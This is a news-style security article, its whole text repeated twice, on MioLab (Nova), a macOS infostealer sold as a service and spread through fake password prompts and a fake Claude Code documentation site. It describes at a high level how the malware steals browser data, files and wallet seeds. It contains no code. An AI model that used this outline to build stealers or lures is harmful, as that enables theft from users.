The MioLab platform has turned macOS's vaunted security into an empty phrase.
The growing popularity of Apple computers is gradually changing the balance of power in the cybercriminal world. While macOS was once considered a niche platform, today attackers see it as a source of stable income. New attack tools demonstrate that the era of "secure Macs" is finally over.
One such tool is the MioLab platform, also known as Nova. Its developers actively promote it on darknet forums and have already built a fully-fledged Malware-as-a-Service model. The service is aimed not at lone attackers, but at teams working with traffic and mass infections. The control panel, API, and automation make using malware as simple as possible.
MioLab's primary goal is to steal data and cryptocurrency. The malware collects passwords, cookies, browser history, and autofill data from popular browsers. A separate module targets crypto wallets : it searches for both extensions like Meta Mask and local wallets, including Exodus and Electrum. Ledger and Trezor hardware devices were particularly targeted, as the malware attempts to intercept recovery seeds.
The infection relies on social engineering . The user is presented with a convincing installation window or a system message asking for a password. Once launched, the program terminates Terminal processes, verifies the entered credentials, and begins collecting information. The malicious code copies files from Documents, Downloads, and the desktop, then packs them into an archive and sends them to the command-and-control server.
Recent updates have significantly expanded the platform's capabilities. Developers have learned to extract data from Safari, which previously remained untouched by attacks. A mechanism for decrypting Apple Notes directly on an infected system has also been added, speeding up the search for passwords and seed phrases. The hardware wallet modules have become universal and adapt to manufacturer updates.
MioLab's infrastructure is closely linked to other fraudulent schemes. Domain analysis revealed that the same servers are used for phishing campaigns featuring fake crypto giveaways. After changing the infrastructure, the attackers don't disable the old addresses, but redirect traffic to new schemes, continuing to profit.
Of additional interest is the active malvertising campaign. Researcher Marcelo Rivero discovered an attack using a fake Claude Code documentation website. MacOS users are targeted by Terminal commands that download and run the infostealer, simultaneously removing system security restrictions.
MioLab is rapidly growing and has already become a mature service with regular updates and customer support. This approach demonstrates that the macOS malware market has reached a new level, where competition and commercialization play a key role.
The growing popularity of Apple computers is gradually changing the balance of power in the cybercriminal world. While macOS was once considered a niche platform, today attackers see it as a source of stable income. New attack tools demonstrate that the era of "secure Macs" is finally over.
One such tool is the MioLab platform, also known as Nova. Its developers actively promote it on darknet forums and have already built a fully-fledged Malware-as-a-Service model. The service is aimed not at lone attackers, but at teams working with traffic and mass infections. The control panel, API, and automation make using malware as simple as possible.
MioLab's primary goal is to steal data and cryptocurrency. The malware collects passwords, cookies, browser history, and autofill data from popular browsers. A separate module targets crypto wallets : it searches for both extensions like Meta Mask and local wallets, including Exodus and Electrum. Ledger and Trezor hardware devices were particularly targeted, as the malware attempts to intercept recovery seeds.
The infection relies on social engineering . The user is presented with a convincing installation window or a system message asking for a password. Once launched, the program terminates Terminal processes, verifies the entered credentials, and begins collecting information. The malicious code copies files from Documents, Downloads, and the desktop, then packs them into an archive and sends them to the command-and-control server.
Recent updates have significantly expanded the platform's capabilities. Developers have learned to extract data from Safari, which previously remained untouched by attacks. A mechanism for decrypting Apple Notes directly on an infected system has also been added, speeding up the search for passwords and seed phrases. The hardware wallet modules have become universal and adapt to manufacturer updates.
MioLab's infrastructure is closely linked to other fraudulent schemes. Domain analysis revealed that the same servers are used for phishing campaigns featuring fake crypto giveaways. After changing the infrastructure, the attackers don't disable the old addresses, but redirect traffic to new schemes, continuing to profit.
Of additional interest is the active malvertising campaign. Researcher Marcelo Rivero discovered an attack using a fake Claude Code documentation website. MacOS users are targeted by Terminal commands that download and run the infostealer, simultaneously removing system security restrictions.
MioLab is rapidly growing and has already become a mature service with regular updates and customer support. This approach demonstrates that the macOS malware market has reached a new level, where competition and commercialization play a key role.
